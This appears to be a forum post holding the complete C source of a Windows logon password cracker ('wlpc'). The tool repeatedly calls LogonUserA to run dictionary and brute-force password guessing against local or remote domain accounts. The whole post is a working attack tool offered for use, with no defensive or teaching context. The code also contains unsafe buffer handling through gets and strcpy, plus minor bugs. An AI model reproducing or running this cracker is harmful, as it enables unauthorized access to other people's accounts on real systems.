Link with advapi32.lib:
Code: Select all
#include <Windows.h>
#include <conio.h>
#include <cstdio>
#include <cstdlib>
#include <cctype>
void die(const char* format, ...) {
va_list v;
va_start(v, format);
vfprintf(stderr, format, v);
exit(1);
}
int logon(const char* user, const char* pass, const char* domain, bool showmsg) {
DWORD ret = 1;
HANDLE tok;
char* msg;
if (!LogonUserA(user,domain,pass,LOGON32_LOGON_NETWORK,LOGON32_PROVIDER_DEFAULT,&tok)) {
ret = 0;
if (showmsg) {
ret = GetLastError();
FormatMessageA(
FORMAT_MESSAGE_ALLOCATE_BUFFER |
FORMAT_MESSAGE_FROM_SYSTEM |
FORMAT_MESSAGE_IGNORE_INSERTS,
NULL,
ret,
NULL,
(char*)&msg,
0, NULL
);
puts(msg);
LocalFree(msg);
}
} else { if (showmsg) puts("Success!"); }
CloseHandle(tok);
return ret;
}
void prompt() {
char *domain, *user, *pass, *input;
domain = (char*)malloc(256);
user = (char*)malloc(256);
pass = (char*)malloc(256);
input = (char*)malloc(256);
domain[0] = '.';
domain[1] = 0;
for (;;) {
fputs("-", stdout);
gets(input);
switch (input[0]) {
case '?':
puts(
"Interactive mode commands:\n"
"d DOMAIN Set domain (Use \".\" for local machine)\n"
"u USER Set username\n"
"p PASS Set password\n"
"x Attempt logon\n"
"q Quit\n"
);
break;
case 'd': strcpy(domain, input + 2); break;
case 'u': strcpy(user, input + 2); break;
case 'p': strcpy(pass, input + 2); break;
case 'x': logon(user, pass, domain, true); break;
case 'q': free(domain); free(user); free(pass); free(input); return;
default: puts("Unknown command\n");
}
}
}
struct pass_type {
bool lcase;
bool ucase;
bool digit;
bool punct;
bool space;
};
void brute(const char* user, struct pass_type * ptype, const char* domain) {
char i;
int j = 0, k;
char * chrs, * pass;
bool carry;
chrs = (char*)malloc(100);
pass = (char*)malloc(256);
if (ptype->lcase) for (i = 'a'; i <= 'z'; i++, j++) chrs[j] = i;
if (ptype->digit) for (i = '0'; i <= '9'; i++, j++) chrs[j] = i;
if (ptype->space) chrs[j++] = ' ';
if (ptype->ucase) for (i = 'A'; i <= 'Z'; i++, j++) chrs[j] = i;
if (ptype->punct) for (i = 0x21; i < 0x7f; i++) if (ispunct(i)) chrs[j++] = i;
for (k = 0; chrs[k]; k++); k--;
chrs[j] = 0;
pass[0] = chrs[0];
pass[1] = 0;
puts("Press Enter anytime to stop. . .");
Sleep(1000);
for (puts(pass); !logon(user, pass, domain, false); puts(pass)) {
if (_kbhit()) if (_getch() == '\r') {
free(chrs);
free(pass);
puts("\nStopped.");
return;
}
i = 0;
do {
if (pass[i] == chrs[k]) {
carry = true;
pass[i] = chrs[0];
} else {
carry = false;
pass[i] = *(strchr(chrs, pass[i]) + 1);
break;
}
} while (pass[++i]);
if (carry) {
j = strlen(pass);
pass[j] = chrs[0];
pass[++j] = 0;
}
}
puts("\nSuccess!");
return;
}
int main(int argc, char ** argv) {
if (argc == 1)
die(
"wlpc - by Jakash3\n"
"Windows Logon Password Cracker\n"
"Usage: %s [username [-w wordfile | -b [-l -u -d -p -s]] [-d domain]] | -i \n\n"
"-w wordfile Dictionary attack. Using file containing line by line passwords\n"
"-b Bruteforce attack using one or more of the following switches:\n"
" -l Include lowercase alphabetical characters.\n"
" -u Include uppercase alphabetical characters.\n"
" -n Include digit characters\n"
" -p Include punctuation characters\n"
" -s Include space\n"
"username Name of user account to try logging in as\n"
"-d domain Optional. Remote Domain or server holding the user account\n"
"-i Interactive mode\n", argv[0]
);
if (argc == 2 && !strcmp(argv[1], "-i")) { prompt(); return 0; }
FILE* f;
char *pass, *domain = ".", *wfile;
bool bf = false;
struct pass_type p;
memset(&p, 0, sizeof(struct pass_type));
int i;
for (i = 1; i < argc; i++) {
if (!strcmp(argv[i], "-d")) domain = argv[++i];
else if (!strcmp(argv[i], "-i")) { prompt(); return 0; }
else if (!strcmp(argv[i], "-w")) wfile = argv[++i];
else if (!strcmp(argv[i], "-b")) bf = true;
else if (!strcmp(argv[i], "-l")) p.lcase = true;
else if (!strcmp(argv[i], "-u")) p.ucase = true;
else if (!strcmp(argv[i], "-n")) p.digit = true;
else if (!strcmp(argv[i], "-p")) p.punct = true;
else if (!strcmp(argv[i], "-s")) p.space = true;
}
if (bf) { brute(argv[1], &p, domain); return 0; }
pass = (char*)malloc(256);
if (!(f = fopen(wfile, "r"))) die("Failed to open %s\n", wfile);
pass = (char*)malloc(256);
puts("Press Enter anytime to stop. . .");
Sleep(1000);
while (!feof(f)) {
if (_kbhit())
if (_getch() == '\r') {
fclose(f);
free(pass);
puts("\nStopped.");
return 0;
}
if (!fgets(pass, 256, f)) break;
*strpbrk(pass, "\r\n") = 0;
puts(pass);
if (logon(argv[1], pass, domain, false)) {
puts("\nSuccess!");
fclose(f);
free(pass);
return 0;
}
}
puts("\nEnd of file!");
fclose(f);
free(pass);
return 0;
}